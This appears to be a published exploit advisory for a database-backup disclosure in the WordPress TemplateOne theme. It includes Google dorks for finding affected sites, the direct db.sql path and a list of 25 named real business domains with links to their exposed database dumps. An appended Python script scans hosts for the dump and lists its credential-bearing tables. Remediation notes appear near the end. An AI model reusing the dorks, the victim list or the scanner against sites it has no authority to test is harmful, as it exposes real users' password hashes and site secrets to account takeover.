#################################################################################################
# Exploit Title : WordPress TemplateOne Themes 1.0 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 02/12/2018
# Vendor Homepage : wordpress.org ~ dubicars.com
# Software Download Link : N/A
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.0
# Google Dorks : inurl:"/wp-content/themes/templateone/"
#                intext:"© Copyright 2015 | Powered by Dubicars"
#                intext:"© Copyright 2017 | Powered by Dubicars"
#                intext:"© Copyright 2018 | Powered by Dubicars"
#                intext:"Powered by Dubicars"
# Exploit Risk : Medium
# CxSecurity Exploit Link : cxsecurity.com/issue/WLB-2018110153
# Exploit4Arab Exploit Link : exploit4arab.org/exploits/2247
# ExploitAlert Exploit Link : exploitalert.com/view-details.html?id=31482
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
#                      CWE-200 - [ Information Exposure ]
#                      CWE-530 - [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
# Admin Panel Login Path : /wp-login.php
# Exploit : /wp-content/themes/templateone/db.sql
#################################################################################################
# Exploit Description :
#   The theme ships (or was deployed) with a raw SQL dump, db.sql, inside its directory under
#   wp-content. The web server treats it as a static file, so an unauthenticated GET request to
#   the path above returns the whole database export. No path traversal is involved; the file is
#   fetched by its normal URL.
#   A WordPress database dump normally contains the wp_users table (user logins, e-mail addresses
#   and password hashes) and the wp_options table (site configuration, and sometimes plugin API
#   keys), so a disclosed backup is a direct route to account compromise.
#   Verification note: an HTTP 200 alone is not proof. Many sites answer unknown paths with a
#   "soft 404" HTML page; confirm that the response body is SQL (mysqldump header, CREATE TABLE,
#   INSERT INTO) before reporting a host as affected.
#   Fix: delete the dump from the web root and deny the .sql extension at the web server level so
#   that a future stray backup is not served.
#################################################################################################
# Example Vulnerable Sites => Vulnerable IP Address => (108.179.230.34) There are 236 domains hosted on this server.
[+] simurghcars.ae/wp-content/themes/templateone/db.sql
[+] romeocars.ae/wp-content/themes/templateone/db.sql
[+] katrjimotors.com/wp-content/themes/templateone/db.sql
[+] algharymotors.ae/wp-content/themes/templateone/db.sql
[+] alaramcars.com/wp-content/themes/templateone/db.sql
[+] alsalamamotors.com/wp-content/themes/templateone/db.sql
[+] diamondclassmotors.com/wp-content/themes/templateone/db.sql
[+] tantoauto.com/wp-content/themes/templateone/db.sql
[+] storyauto-middleeast.com/wp-content/themes/templateone/db.sql
[+] whitemotors.org/wp-content/themes/templateone/db.sql
[+] 555motors.ae/wp-content/themes/templateone/db.sql
[+] tahanmotors.com/wp-content/themes/templateone/db.sql
[+] binhumaidan.com/wp-content/themes/templateone/db.sql
[+] formulaautofze.com/wp-content/themes/templateone/db.sql
[+] alnayrabusedcarstrading.com/wp-content/themes/templateone/db.sql
[+] exoticusedcarstr.com/wp-content/themes/templateone/db.sql
[+] dairausedcars.com/wp-content/themes/templateone/db.sql
[+] usmotorsuae.com/wp-content/themes/templateone/db.sql
[+] saleemmotors.com/wp-content/themes/templateone/db.sql
[+] moradmotors.com/wp-content/themes/templateone/db.sql
[+] najemmotors.com/wp-content/themes/templateone/db.sql
[+] jwmotors.net/wp-content/themes/templateone/db.sql
[+] ibitisammotors.com/wp-content/themes/templateone/db.sql
[+] classmotorsuae.com/wp-content/themes/templateone/db.sql
[+] alshibamotors.com/wp-content/themes/templateone/db.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
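The check for the path given under "Exploit" above, written as a small Python script. This is an added example, not code from the original advisory or from the theme author: it requests only the first 4 KiB of db.sql, refuses to call a host affected unless the body actually looks like a MySQL dump (so an HTML soft-404 served with HTTP 200 is not counted), and lists which credential- or config-bearing WordPress tables the dump references. The host names, the two sample response bodies and the marker patterns are constructed for illustration; the User-Agent string and the 4 KiB cut-off are arbitrary choices.

```python
"""Checker for an exposed WordPress database dump at a fixed theme path.

Added example for the advisory above; not the advisory author's code.
SAMPLE_DUMP and SAMPLE_SOFT_404 are constructed test inputs, not captured data.
"""
import re
import urllib.error
import urllib.request

# Path reported in the advisory.
BACKUP_PATH = "/wp-content/themes/templateone/db.sql"

# Lines that a mysqldump / phpMyAdmin export contains near the top of the file.
_SQL_MARKERS = re.compile(
    rb"(?im)^\s*(?:-- (?:MySQL dump|phpMyAdmin SQL Dump)|CREATE TABLE|INSERT INTO|DROP TABLE IF EXISTS)"
)
# An HTML wrapper means we got an error page or the site's front end, not a dump.
_HTML = re.compile(rb"(?i)<!doctype html|<html")
# WordPress tables whose contents matter most: password hashes and site configuration.
# The table prefix (wp_ by default) is configurable, so it is matched loosely.
_SENSITIVE_TABLES = re.compile(rb"`(?:\w+_)?(?:users|usermeta|options)`")


def build_url(host: str, scheme: str = "https") -> str:
    """Turn a bare host name (or a full origin) into the URL of the backup file."""
    host = host.strip().rstrip("/")
    if "://" in host:
        return host + BACKUP_PATH
    return f"{scheme}://{host}{BACKUP_PATH}"


def looks_like_sql_dump(body: bytes) -> bool:
    """True when the first bytes carry SQL dump markers and no HTML wrapper."""
    head = body[:4096]
    if _HTML.search(head):
        return False
    return _SQL_MARKERS.search(head) is not None


def sensitive_tables(body: bytes) -> list[str]:
    """Sorted, de-duplicated names of credential/config tables referenced in the dump."""
    return sorted({m.group(0).strip(b"`").decode() for m in _SENSITIVE_TABLES.finditer(body)})


def classify(status: int, body: bytes) -> str:
    """Map an HTTP status plus body prefix to a verdict a report can use."""
    if status in (200, 206) and looks_like_sql_dump(body):
        return "VULNERABLE"
    if status in (200, 206):
        return "NOT_SQL"      # soft-404 or unrelated content served at that URL
    if status in (401, 403):
        return "BLOCKED"      # something answers but refuses; file may still exist
    return "ABSENT"


def check_host(host: str, timeout: float = 10.0) -> tuple[str, list[str]]:
    """Fetch up to 4 KiB of the backup path on one host and classify the answer."""
    req = urllib.request.Request(
        build_url(host),
        headers={"Range": "bytes=0-4095", "User-Agent": "db-backup-check/1.0"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status, body = resp.status, resp.read(4096)  # read() caps servers that ignore Range
    except urllib.error.HTTPError as exc:
        status, body = exc.code, b""
    except (urllib.error.URLError, OSError):
        return "ERROR", []
    verdict = classify(status, body)
    return verdict, (sensitive_tables(body) if verdict == "VULNERABLE" else [])


# Constructed sample responses (not captured from any real site).
SAMPLE_DUMP = b"""-- MySQL dump 10.13  Distrib 5.7.22, for Linux (x86_64)
--
-- Host: localhost    Database: wordpress
-- ------------------------------------------------------
DROP TABLE IF EXISTS `wp_options`;
CREATE TABLE `wp_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT
);
CREATE TABLE `wp_users` (
  `user_login` varchar(60) NOT NULL DEFAULT ''
);
INSERT INTO `wp_users` VALUES (1,'admin','$P$BexampleHashValueNotRealXXXXXXXXXX');
"""
SAMPLE_SOFT_404 = (
    b"<!DOCTYPE html><html><head><title>Page not found</title></head>"
    b"<body>INSERT INTO nothing here, this is an error page</body></html>"
)


if __name__ == "__main__":
    import sys
    for h in sys.argv[1:]:
        verdict, tables = check_host(h)
        extra = f" (tables: {', '.join(tables)})" if tables else ""
        print(f"{h}: {verdict}{extra}")
```

Run it as `python3 check_db_sql.py host1 host2 ...` against hosts you are authorised to test. Only `VULNERABLE` means the dump was actually served; `NOT_SQL` is the soft-404 case the advisory's Google dork will also surface, and `BLOCKED` deserves a follow-up because a 403 on that exact path usually means the file is present but access has been denied after the fact. On the defending side, the remediation is to remove the file and to deny the `.sql` extension in the web server configuration for the whole document root, not only for this theme directory.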